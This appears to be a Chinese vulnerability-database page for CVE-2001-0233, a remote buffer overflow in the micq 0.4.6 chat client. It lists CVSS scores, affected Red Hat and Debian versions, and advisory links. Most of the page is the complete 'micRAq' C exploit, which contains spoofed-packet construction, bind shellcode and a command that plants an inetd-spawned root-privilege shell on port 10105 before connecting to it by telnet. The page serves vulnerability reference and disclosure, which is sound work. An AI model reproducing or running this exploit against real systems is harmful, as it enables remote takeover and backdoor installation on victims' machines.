CVE-2001-0233
CVSS10.0
发布时间 :2001-03-26 00:00:00
修订时间 :2008-09-05 16:23:36
NMCOE    

[原文]Buffer overflow in micq client 0.4.6 and earlier allows remote attackers to cause a denial of service, and possibly execute arbitrary commands, via a long Description field.


[CNNVD]Micq client拒绝服务漏洞(CNNVD-200103-085)

        Micq client 0.4.6及其之前的版本存在缓冲区溢出漏洞。远程攻击者可以借助超长Description字段导致服务拒绝,并且可能可以执行任意命令。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:redhat:linux:6.2Red Hat Linux 6.2
cpe:/o:debian:debian_linux:2.2Debian Debian Linux 2.2
cpe:/o:redhat:linux:6.1Red Hat Linux 6.1
cpe:/o:redhat:linux:6.0Red Hat Linux 6.0
cpe:/a:matthew_smith:micq:0.4.6
cpe:/o:redhat:linux:7.0Red Hat Linux 7.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0233
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0233
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200103-085
(官方数据源) CNNVD

- 其它链接及资源

http://www.redhat.com/support/errata/RHSA-2001-005.html
(PATCH)  REDHAT  RHSA-2001:005
http://www.debian.org/security/2001/dsa-012
(VENDOR_ADVISORY)  DEBIAN  DSA-012
http://archives.neohapsis.com/archives/bugtraq/2001-01/0395.html
(VENDOR_ADVISORY)  BUGTRAQ  20010124 patch Re: [PkC] Advisory #003: micq-0.4.6 remote buffer overflow
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-01:14.micq.asc
(VENDOR_ADVISORY)  FREEBSD  FreeBSD-SA-01:14
http://xforce.iss.net/static/5962.php
(VENDOR_ADVISORY)  XF  micq-sprintf-remote-bo(5962)
http://archives.neohapsis.com/archives/bugtraq/2001-01/0307.html
(UNKNOWN)  BUGTRAQ  20010118 [PkC] Advisory #003: micq-0.4.6 remote buffer overflow

- 漏洞信息

Micq client拒绝服务漏洞
危急 缓冲区溢出
2001-03-26 00:00:00 2005-05-02 00:00:00
远程  
        Micq client 0.4.6及其之前的版本存在缓冲区溢出漏洞。远程攻击者可以借助超长Description字段导致服务拒绝,并且可能可以执行任意命令。

- 公告与补丁

        

- 漏洞信息 (20569)

mICQ 0.4.6 Remote Buffer Overflow Vulnerability (EDBID:20569)
linux remote
2001-01-17 Verified
0 tHE rECIdjVO
N/A [点击下载]
source: http://www.securityfocus.com/bid/2254/info

micq is a chat program for Linux systems.

micq-0.4.6 running on Linux/ix86 (Slackware 7.1 - RedHat 6.1) is vulnerable to a remote buffer overflow attack. Other versions on other platforms may also be vulnerable.

This may allow remote attackers to gain access to vulnerable hosts. 

/*
                [ micRAq ] - by tHE rECIdjVO <recidjvo@pkcrew.org>
                        Packet Knights - http://www.pkcrew.org/

   - version affected: micq-0.4.6 - maybe others (http://freshmeat.net/)
   - coded for: ix86/Linux-2.2.16
   - gcc version: egcs-2.91.66

   usage: ./micRAq <client_ip> <client_port> <server_ip> <hex_session> [address]

   Please read PkC Advisory #003 first.
   Catch parameters with tcpdump-3.6.1 (http://www.tcpdump.org/)
   Last 4 shown bytes are <hex_session>
   # tcpdump -i <interface> -s 49 -tnx udp src port 4000

   Dedicated to: Francesca (I'll never forget you :*)
   Tnx: |CyRaX|, asynchro, vecna, Nail, [ndk], MatOfPeng

                                                                        */

#define DEFAULT_BUFFER_ADDRESS 0xbfffeea0
#define OFFSET 991
#define ICQ_SERVER_PORT 4000
#define BACK_PORT "10105"
#define NOP '\x90'
#define COMMAND "echo -e \"" BACK_PORT " stream tcp nowait `whoami` /bin/sh sh -i\">/tmp/.micRAqbd;/usr/sbin/inetd /tmp/.micRAqbd;sleep 1;rm /tmp/.micRAqbd;exit;"

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/udp.h>

int main(int argc, char *argv[]);
unsigned short in_cksum (u_short *addr, int len); // Ripped. Who didn't it? ;)
void build_buffer(char *buffer, unsigned long *buff_addr);
int go(char *ip);

// bind shellcode by [multiple]
char shellcode[]=
        "\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
        "\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
        "\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
        "\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
        "\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
        "\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
        "\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
        "\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";

typedef struct
{
        unsigned char uin[4];
        unsigned char year[2];
        unsigned char month;
        unsigned char day;
        unsigned char hour;
        unsigned char minute;
        unsigned char type[2];
        unsigned char len[2];
} RECV_MESSAGE, *RECV_MESSAGE_PTR;

struct SRV_ICQ_pak
{
        unsigned char ver[2];
        unsigned char zero;
        unsigned char session[4];
        unsigned char cmd[2];
        unsigned char seq[2];
        unsigned char seq2[2];
        unsigned char UIN[4];
        unsigned char check[4];
};

struct srv_net_icq_pak
{
        struct SRV_ICQ_pak head;
        unsigned char data[1024];
};

unsigned short in_cksum (u_short *addr, int len)
{
        register int nleft = len;
        register u_short *w = addr;
        register int sum = 0;
        u_short answer = 0;

        while (nleft > 1) {
                sum += *w++;
                nleft -= 2;
        }
        if (nleft == 1) {
                *(u_char *)(&answer) = *(u_char *)w;
                sum += answer;
        }

        sum = (sum >> 16) + (sum & 0xffff);
        sum += (sum >> 16);
        answer = ~sum;
        return(answer);
}

void build_buffer(char *buffer, unsigned long *buff_addr)
{
        // Fill the data headers
        memset(buffer, '\b', 1024);
        memset(buffer, '\0', 7);
        buffer[4] = '\x04';
        buffer[8] = '\xFE';

        // Fill the buffer
        memset(buffer + 9, NOP, strtoul(buffer, NULL, 10) + OFFSET - strlen(shellcode) - 9);
        memcpy(buffer + OFFSET - strlen(shellcode), shellcode, strlen(shellcode));
        memcpy(buffer + OFFSET, buff_addr, 4);
        buffer[1023] = '\0';
        return;
}       

int go(char *ip)
{
        int sock, conn;
        struct sockaddr_in saddr;

        // Create socket
        if((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
                perror("socket()");
                return(-1);
        }

        saddr.sin_family = AF_INET;
        saddr.sin_addr.s_addr = inet_addr(ip);
        saddr.sin_port = htons(3879);

        // Connect to 3879 and issue COMMAND
        if((conn = connect(sock, (struct sockaddr *)&saddr, sizeof(saddr))) < 0) {
                perror("connect()");
                return(-1);
        }

        send(sock, COMMAND, sizeof(COMMAND), 0);

        // All done here
        close(sock);
        return(0);
}

int main(int argc, char *argv[])
{
        int sock, i, hincl = 1;
        unsigned long buff_addr = DEFAULT_BUFFER_ADDRESS;
        struct sockaddr_in saddr;
        struct ip *pip;
        struct udphdr *pudp;
        char *packet, conv[3];
        struct srv_net_icq_pak *pak;
        RECV_MESSAGE_PTR r_data;

        printf("\n\t[ [ micRAq ] - by tHE rECIdjVO <recidjvo@pkcrew.org> ]\n\t\tPacket Knights - http://www.pkcrew.org/\n\n");

        if((argc != 5) && (argc != 6)) {
                printf("usage: %s <client_ip> <client_port> <server_ip> <hex_session> [buffer]\n\n", argv[0]);
                exit(-1);
        }

        if(strlen(argv[4]) != 8) {
                printf("Error: <session> must be 8 digits exadecimal number.\n\n");
                exit(-1);
        }

        if(argc == 6) {
                buff_addr = strtoul(argv[5], NULL, 16);
        }
        printf("Using buffer address: 0x%x\n\n", buff_addr);

        // Create the RAW socket
        if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
                perror("socket()");
                exit(-1);
        }

        if(setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &hincl, sizeof(hincl)) < 0) {
                perror("setsockopt()");
                close(sock);
                exit(-1);
        }

        // Set pointers
        packet = malloc(sizeof(struct ip) + sizeof(struct udphdr) + 1024);
        pip = (struct ip *)packet;
        pudp = (struct udphdr *)(packet + sizeof(struct ip));
        pak = (struct srv_net_icq_pak *)(packet + sizeof(struct ip) + sizeof(struct udphdr));

        // Clear packet
        memset(packet, 0, sizeof(struct ip) + sizeof(struct udphdr) + 1024);

        // Fill the packet headers
        saddr.sin_family = AF_INET;
        saddr.sin_addr.s_addr = inet_addr(argv[1]);
        pip->ip_len = htons(sizeof(struct ip) + sizeof(struct udphdr) + 1024);
        pip->ip_hl = 5;
        pip->ip_v = 4;
        pip->ip_ttl = 255;
        pip->ip_tos = 0;
        pip->ip_off = 0;
        pip->ip_id = htons(getpid());
        pip->ip_p = IPPROTO_UDP;
        pip->ip_src.s_addr = inet_addr(argv[3]);
        pip->ip_dst.s_addr = inet_addr(argv[1]);
        pip->ip_sum = in_cksum((u_short*)pip, sizeof(struct ip));
        pudp->source = htons(ICQ_SERVER_PORT);
        pudp->dest = htons(atoi(argv[2]));
        pudp->len = htons(sizeof(struct udphdr) + 1024);
        pudp->check = 0;

        // Fill the message headers
        pak->head.ver[0] = 5;
        pak->head.ver[1] = 0;
        pak->head.zero = 0;

        for(i = 0; i < 8; i += 2) {
                conv[0] = argv[4][i];
                conv[1] = argv[4][i + 1];
                conv[2] = '\0';

                pak->head.session[i / 2] = strtol(conv, NULL, 16);
        }

        pak->head.cmd[0] = 4;
        pak->head.cmd[1] = 1;
        pak->head.seq[0] = 0;
        pak->head.seq[1] = 0;
        pak->head.seq2[0] = 0;
        pak->head.seq2[1] = 0;
        pak->head.UIN[0] = 0;
        pak->head.UIN[1] = 0;
        pak->head.UIN[2] = 0;
        pak->head.UIN[3] = 0;
        pak->head.check[0] = 0;
        pak->head.check[1] = 0;
        pak->head.check[2] = 0;
        pak->head.check[3] = 0;

        // Fill the buffer
        build_buffer(pak->data, &buff_addr);

        // Send the packet
        if(sendto(sock, packet, sizeof(struct ip) + sizeof(struct udphdr) + 1024, 0, (struct sockaddr *)&saddr, sizeof(struct sockaddr_in)) < 0) {
                perror("sendto()");
                close(sock);
                exit(-1);
        }

        // Clear the socket
        close(sock);

        // Send command to execute inetd backdoor
        sleep(1);

        // First connect
        if(go(argv[1]) < 0) {
                printf("Unable to connect :\\\n");
                exit(-1);
        }

        // Wait a bit to let the command to be issued
        sleep(1);
        printf("\t\"To be");
        fflush(stdout);
        sleep(2);
        printf(", or not to be.\n");
        sleep(1);
        printf("\t This is the question.\"\n");
        sleep(1);
        printf("\t\t\t(William Shakespeare)\n\n");

        // Connect to remote host
        execl("/usr/bin/telnet", "telnet", argv[1], BACK_PORT, NULL);

        // Never been here
        exit(-1);
}

/*                          micRAq.c - EOF                              */
		

- 漏洞信息

6988
mICQ Client Description Handling Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2001-01-17 Unknow
2001-01-17 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站